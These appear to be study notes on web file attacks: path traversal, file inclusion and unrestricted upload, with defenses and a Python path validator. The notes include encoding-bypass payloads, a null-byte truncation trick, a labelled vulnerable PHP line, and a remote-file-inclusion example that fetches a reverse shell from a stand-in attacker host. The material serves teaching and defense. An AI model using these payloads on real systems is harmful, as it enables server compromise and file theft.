Files and Resources Attacks

Path Traversal

A parameter references a file on the web server, and the application fails to validate it, so an attacker can supply a payload such as ../ to read arbitrary files on the server.

For PHP < 5.3.4, the requested path can be terminated with %00, a NULL byte. For example, if the web app does:

// vulnerable: user input is concatenated straight into the path
file_get_contents("/document/" . $user_input . ".pdf");

The attacker appends %00 to the input so that everything after it, including the appended .pdf extension, is ignored by the underlying C string functions.

Bypass by encoding

  • URL encoding / 16-bit Unicode (%uXXXX) encoding

    . = %2e = %u002e
    / = %2f = %u2215
    \ = %5c = %u2216

Defense

  • Filter . / \ after decoding the input, so that the encoded forms above are caught as well
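
The checks above, as an added Python example (not code from the original notes); the base directory /document and the .pdf suffix are assumed to match the example earlier on the page. It decodes the parameter (including the %uXXXX form and double encoding), rejects a null byte, applies the filter on . / \, and finally confirms the resolved path is still inside the base directory.

```python
import os
import re
from urllib.parse import unquote

# Assumed layout, mirroring the page's "/document/" + user_input + ".pdf" example.
BASE_DIR = "/document"
SUFFIX = ".pdf"

# %u2215 (division slash) and %u2216 (set minus) are the look-alike code points the
# page lists; some decoders fold them to '/' and '\', so they are treated as such here.
_LOOKALIKES = {"\u2215": "/", "\u2216": "\\"}


def _decode_once(value):
    # Expand the non-standard %uXXXX form (urllib ignores it), then ordinary %XX.
    value = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), value)
    value = unquote(value)
    for ch, ascii_ch in _LOOKALIKES.items():
        value = value.replace(ch, ascii_ch)
    return value


def check_user_path(user_input):
    """Return (True, safe_path) or (False, reason) for a user-supplied document name."""
    decoded = user_input
    for _ in range(3):  # repeat so double encoding (%252e -> %2e -> .) is caught
        again = _decode_once(decoded)
        if again == decoded:
            break
        decoded = again
    if "\x00" in decoded:
        return False, "null byte"  # the PHP < 5.3.4 extension-truncation trick
    bad = [c for c in (".", "/", "\\") if c in decoded]
    if bad:
        return False, "forbidden char " + " ".join(bad)  # the page's filter: . / \
    # Defence in depth: resolve the final path and confirm it stays under BASE_DIR.
    full = os.path.normpath(os.path.join(BASE_DIR, decoded + SUFFIX))
    if os.path.commonpath([BASE_DIR, full]) != BASE_DIR:
        return False, "escapes base dir"
    return True, full
```

The rejection reason is returned rather than only a boolean so the application can log which bypass was attempted.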

File Inclusion

Local File Inclusion

  • Similar to path traversal with ../, except the file is included and executed rather than only read

Remote File Inclusion

  • e.g. vuln.php?page=http://attacker.site/reverse-shell.php

Root cause:

  • The allow_url_include directive is set to On in php.ini

Unrestricted File Upload

No check on the uploaded file --> leads to a malicious page being served (e.g. a PHP reverse shell).

Conditions:

  • The file type is not checked

  • The file name and path of the uploaded document are known / guessable

  • The folder in which the file is placed allows the execution of server-side scripts

Defenses

  1. Check metadata (name, extension, size ...)

    1. Whitelist / blacklist

  2. Check the actual content

    1. Determine the file type from the uploaded content (e.g. its magic bytes), not from the name or extension the client supplies
